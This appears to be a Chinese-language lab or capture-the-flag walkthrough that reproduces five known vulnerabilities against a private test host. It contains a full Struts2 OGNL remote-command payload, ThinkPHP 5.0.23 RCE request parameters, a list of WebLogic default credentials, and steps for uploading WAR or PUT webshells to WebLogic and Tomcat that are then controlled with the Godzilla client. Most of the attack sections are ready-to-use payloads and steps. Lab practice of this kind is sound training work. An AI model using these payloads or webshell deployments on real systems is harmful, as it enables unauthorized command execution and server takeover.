- Struts2远程命令执行漏洞复现
访问http://192.168.56.143:8081/页面,Burpsuite抓取数据包,插入如下payload
Content-Type:%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}.multipart/form-data
Content-Length: 2
其中whoami为执行的命令,可进行更改
读取Key.txt
- thinkphp-5.0.23-rce远程命令执行漏洞复现
访问http://192.168.56.143:8082/页面,burpsuite抓取数据包
更改请求方式为post
url更改为:/index.php?s=captcha
提交数据参数为:
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd
其中pwd为所要执行的命令
- weblogic弱口令漏洞复现
访问http://192.168.56.143:8083/console/login/LoginForm.jsp
管理后台登录页面
使用weblogic常用弱口令进行登录尝试
weblogic/Oracle@123
system/password
weblogic/weblogic
admin/security
joe/password
wlcsystem/wlcsystem
成功使用weblogic/Oracle@123登录管理后台
点击左侧的部署,可见一个应用列表:
点击安装,选择“上载文件”,上传war包,上传成功之后,war包自动解压部署。
将shell.jsp添加压缩文件为shell.zip,更改扩展名为.war
上传war包,持续下一步,点击完成,保存
哥斯拉连接上传的shell.jsp
http://192.168.56.143:8083/shell/shell.jsp
- Tomcat PUT方法任意写文件漏洞复现
访问http://192.168.56.143:8084/页面,burpsuite抓取数据包
更改请求方式为PUT,url为/webshell.jsp/,提交数据为木马文件内容
哥斯拉连接webshell.jsp
http://192.168.56.143:8084/webshell.jsp
- Tomcat弱口令漏洞复现
访问http://192.168.56.143:8085/页面,点击Manager APP,跳转后台登录
使用tomcat/tomcat弱口令进行登录
上传文件处,上传war包,上传成功之后,部署war包,点击Reload,running值显示为ture。
哥斯拉连接shell.jsp
http://192.168.56.143:8085/shell/shell.jsp